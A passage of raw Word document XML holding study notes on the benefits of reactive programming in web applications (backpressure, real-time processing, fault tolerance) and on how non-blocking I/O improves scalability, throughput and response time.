    <w:p w14:paraId="58DA6C94"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Reactive programming offers built-in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>backpressure handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which means the system can control how data is pushed when the consumer is slower than the producer. This prevents overwhelming the system when it can't process data fast enough, leading to better resource management and stability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E844B79"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In streaming services, backpressure ensures that data is delivered at a rate the client can handle, preventing memory overload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44503567" w14:textId="77777777" w:rsidR="00DA478E" w:rsidRPr="00B13F85" w:rsidRDefault="00DA47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6. Real-time Processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541D7F17"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Reactive programming is well-suited for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-time processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications such as messaging, social media feeds, financial services, and IoT devices. It enables your web application to handle real-time updates and events efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA18AEC"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A financial dashboard displaying real-time stock prices can update instantly as new data streams in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725B32FC" w14:textId="77777777" w:rsidR="00DA478E" w:rsidRPr="00B13F85" w:rsidRDefault="00DA47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7. Improved User Experience:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBFD0AE"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With the ability to handle multiple asynchronous operations concurrently, reactive applications offer </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>faster and more responsive</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> user experiences. Users do not have to wait for one request to complete before another is processed, reducing perceived latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB562AC"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A web application that loads data in chunks (e.g., infinite scroll) without blocking the UI will offer a smoother, faster user experience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05975AEC" w14:textId="77777777" w:rsidR="00DA478E" w:rsidRPr="00B13F85" w:rsidRDefault="00DA47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8. Event-driven Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A87BBB8"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Reactive programming naturally supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is a design where the flow of the program is determined by events, such as user actions, messages from other services, or external system triggers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64394D38"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Microservices that communicate with each other using event-driven models (e.g., Kafka, RabbitMQ) can be built with reactive programming to ensure efficient handling of events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05545336" w14:textId="77777777" w:rsidR="00DA478E" w:rsidRPr="00B13F85" w:rsidRDefault="00DA47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9. Improved Fault Tolerance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F08E762"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Reactive systems can be more </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resilient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to failures. They can continue operating even if certain parts of the system are slow or temporarily unavailable, thanks to features like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>retry logic</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timeout handling</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fallback mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A146E2"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If an external API is down, the application can handle the error gracefully and proceed with a cached response or a default value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D29335A" w14:textId="77777777" w:rsidR="00DA478E" w:rsidRPr="00B13F85" w:rsidRDefault="00DA47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lastRenderedPageBreak/>
        <w:t>10. Easier to Handle Complex Workflows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A3E912"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Complex workflows that involve multiple asynchronous operations can be managed more easily with reactive programming, as it simplifies chaining of operations and error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B314E86"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A multi-step process like submitting a form, validating the input, saving the data to the database, and sending a confirmation email can all be done in a reactive, non-blocking way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9E559B" w14:textId="77777777" w:rsidR="00DA478E" w:rsidRPr="00B13F85" w:rsidRDefault="00DA47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1. Concurrency Without Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E46D681"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traditional systems, managing concurrency can be challenging, especially when it comes to shared resources and thread management. Reactive programming abstracts this complexity and allows you to write cleaner, non-blocking code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9FD95F"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Instead of using complex concurrency models like thread pools and mutexes, reactive programming allows you to chain asynchronous operations declaratively, minimizing the potential for race conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6562E86D" w14:textId="77777777" w:rsidR="00DA478E" w:rsidRPr="00B13F85" w:rsidRDefault="00DA47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2. Better Handling of Slow Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7B926A"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hen certain tasks (such as database queries or API calls) take longer to complete, reactive programming allows your application to keep responding to other requests, avoiding bottlenecks. This improves overall throughput and responsiveness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ACA6CE"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A web service that calls multiple external APIs for data can make all the calls concurrently without blocking each one, reducing overall response time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B87EC73" w14:textId="77777777" w:rsidR="00DA478E" w:rsidRPr="00B13F85" w:rsidRDefault="00DA47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3. Cleaner, More Maintainable Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3886D9C9"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active programming encourages writing code in a declarative, readable manner, which can be easier to maintain, as complex logic is broken down into smaller, composable units that are easier to test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285DBDFA"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Handling user input validation, transformation, and server response can be done in a single, reactive pipeline, which is easier to understand compared to complex callback chains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4DDE03" w14:textId="77777777" w:rsidR="00DA478E" w:rsidRPr="00B13F85" w:rsidRDefault="00DA47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onclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594AE9C9" w14:textId="77777777" w:rsidR="00DA478E" w:rsidRPr="00B13F85" w:rsidRDefault="00DA47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active programming in web applications enables high-performance, scalable, and responsive systems that can handle large numbers of concurrent users and asynchronous data streams. It simplifies the handling of complex workflows, enhances user experience, and maximizes resource utilization. While it introduces some learning curve, the benefits make it particularly suitable for modern web applications dealing with real-time data, high concurrency, and complex interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B0C8EE"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469A243">
          <v:rect id="_x0000_i2306" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9E2B12" w14:textId="486B8E3B"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12" w:name="_Toc196307992"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does non-blocking I/O enhance application performance</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="512"/>
    </w:p>
    <w:p w14:paraId="1256FEF2" w14:textId="71850F07" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E86"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Non-blocking I/O significantly enhances application performance by improving how the application handles input/output (I/O) operations, particularly in environments with high concurrency or slow network operations. Here’s how non-blocking I/O contributes to better performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7F5345" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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 Reduced Resource Usage (Thread Efficiency):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AA513C"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Blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations require the application to dedicate a thread for each I/O request (e.g., reading from a file, making a network call). While waiting for I/O operations to complete, these threads remain idle, consuming system resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FB5C76"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n contrast, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows the thread to initiate an I/O operation and continue doing other tasks while waiting for the I/O to complete. This reduces the number of threads required to handle many I/O requests, leading to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>better CPU and memory utilization</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less overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331709C3"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Instead of blocking a thread to wait for a database query result, the thread can be used to handle other tasks (like processing other requests) until the database response is ready.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DE5117" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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2. Improved Scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD98B44"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With non-blocking I/O, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can handle multiple I/O requests concurrently by using asynchronous methods. This is especially beneficial for handling </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a large number of concurrent users</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C0741E"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raditional </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> requires creating multiple threads (one per I/O request), which can quickly exhaust system resources as the number of requests grows. With non-blocking I/O, fewer threads are needed, and the system can handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>more requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>less resource consumption</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42335028"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A server can handle thousands of client requests concurrently with only a few threads in a non-blocking I/O model, whereas in a blocking I/O system, each request requires its own thread, which could quickly lead to resource exhaustion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4596DD48" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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3. Faster Response Time:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B3E953"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Non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> helps reduce latency by ensuring that a thread does not get stuck waiting for an I/O operation to complete. The thread can continue with other tasks, allowing the system to respond to incoming requests more quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0AEAA5"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 xml:space="preserve">Non-blocking operations enable faster processing of </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple concurrent tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which leads to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>faster response times</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for users, especially in web applications, APIs, or real-time applications that require low-latency responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D89F73"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In a web server handling requests for multiple resources, the server can quickly handle multiple requests simultaneously by performing I/O operations non-blocking, reducing the time a client waits for a response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7669BAA4" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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4. Improved Throughput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512A2ACD"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Non-blocking I/O increases the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of an application, which refers to the number of operations or tasks completed in a given time. Since the threads are not blocked waiting for I/O to complete, the application can process more requests or tasks in parallel and can scale better to handle increased traffic or data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B8D2D0"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In a high-traffic web application, non-blocking I/O allows the server to process more HTTP requests per second because it doesn’t spend time waiting for responses from the database, files, or APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227C5553" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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5. Better User Experience:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E209E0"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Non-blocking I/O leads to a more responsive application, enhancing the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>user experience</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Since the server can quickly respond to other requests while waiting for I/O operations, users can interact with the system more seamlessly, leading to lower perceived latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A19D1B"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real-time applications like messaging, notifications, or live data feeds, non-blocking I/O ensures that updates happen instantly without delays.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1500A1"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A messaging app can receive and send messages in real-time without delays, even when the backend performs other tasks such as saving data to the database or fetching data from external APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC60904" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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6. Improved Fault Tolerance and Resilience:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B54A0EB"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n a system using non-blocking I/O, the application can continue processing tasks even if some operations are slow or fail, instead of blocking and waiting for each I/O operation to complete sequentially. This improves </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fault tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and makes the application </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>more resilient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AE0F44"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f an I/O operation takes too long (e.g., a network call), the system can continue to process other requests without being stalled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588C90DF"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A microservice application with multiple external API calls can continue processing other tasks even if one API is temporarily slow or unavailable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239EADCE" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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7. Better Handling of Slow Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197E75CE"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Non-blocking I/O is particularly useful when working with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>slow I/O operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like network requests, disk I/O, or database queries. By not blocking the thread while waiting for these operations to complete, the system can use its resources more efficiently and avoid performance bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237A1BA1"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A web service querying a slow database or third-party service will not slow down the entire application. Instead, the server can continue processing other requests while waiting for the slow query to return.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E82C762" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E8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8. Increased Responsiveness in Real-time Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A27B08D"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Non-blocking I/O is ideal for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-time applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like chat applications, live notifications, or stock tickers, where the system needs to react to events as they happen. It allows the application to continuously process incoming data without waiting for previous requests to finish.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FACE2AB"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r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In a real-time stock trading app, non-blocking I/O ensures that the user interface can be updated with live data without any delays, even when receiving continuous updates from external data sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2680A4F9" w14:textId="77777777" w:rsidR="00EA0E86"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A895A38">
          <v:rect id="_x0000_i2307" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
